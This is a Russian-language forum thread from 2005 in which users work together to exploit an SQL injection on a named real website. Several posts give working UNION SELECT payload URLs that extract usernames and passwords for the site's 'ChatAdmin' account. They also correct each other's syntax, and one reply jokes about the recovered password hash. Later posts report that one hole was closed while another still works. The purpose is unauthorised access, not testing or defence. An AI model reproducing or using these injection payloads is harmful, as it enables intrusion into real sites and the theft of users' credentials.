 |
|
04.10.2005, 07:47
|
|
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами:
11456832
Репутация:
2
|
|
Sql иньекция в nepom.ru
Коротко и ясно уязвимость обнаружел на http://nepom.ru/users/?login=' Далее не могу понять как открыть таблицы Вродебы пишу всё правильно.
Пример http://nepom.ru/users/?login=-1%20UN...ll,null%20FROM w3t Users WHERE U_Username='admin'/*
ИТД помогите разобраться.... |
|
|
04.10.2005, 15:26
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
С нами:
11081186
Репутация:
9
|
|
А от куда ты знаешь имена таблиц?
|
|
|
|
04.10.2005, 15:51
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами:
11393666
Репутация:
47
|
|
1. У тебя неправильный синтаксис: после -1 нужно ставить ', а потом комментировать т.к. в запросе значение взято в кавычки.
2. Ты выбираешь 5 столбцов, когда там нужно всего один.
3. Нет вывода результата, поэтому посмотреть пароль не получится.
Поэтому тебе нужно искать другую sql-инъекцию 
Если бы был вывод, правильный запрос был бы вот такой:
http://nepom.ru/users/?login=-1'%20UNION%20SELECT%20passwd%20FROM%20users/*
|
|
|
|
04.10.2005, 16:01
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами:
11393666
Репутация:
47
|
|
Вот тебе настоящая sql-инъекция!
http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
Сейчас только логины менять 
Последний раз редактировалось virgoz; 04.10.2005 в 16:04..
|
|
|
|
04.10.2005, 16:26
|
|
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами:
11456832
Репутация:
2
|
|
http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
SQL скорее всего не получиться... т.к. он выбирает id, а id скорее всего INTEGER, а пароль VARCHAR.... скорее всего... поэтому UNION не работает... выбор идет только по одному INTEGER полю
Если вам не лень посмотрите может я ошибаюсь... Спасибо!
|
|
|
|
04.10.2005, 16:43
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами:
11393666
Репутация:
47
|
|
Вот так:
http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
!!! Когда будете вставлять, в слове "u sers" уберите пробел
Последний раз редактировалось virgoz; 04.10.2005 в 16:50..
|
|
|
|
06.10.2005, 06:27
|
|
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
С нами:
11442626
Репутация:
429
|
|
Ххыхыхыхых хеш 123
|
|
|
|
06.10.2005, 09:05
|
|
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами:
11456832
Репутация:
2
|
|
http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
Выполняю данный запрос 1 назад всё работоло сей час что-то не работает видать нашли багу. Ктонить может обьяснить что произошло.....
|
|
|
|
06.10.2005, 09:32
|
|
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
С нами:
10863746
Репутация:
519
|
|
багу прикрыли
а http://nepom.ru/users/?login=' еще работает
|
|
|
|
06.10.2005, 09:34
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами:
10937126
Репутация:
1316
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
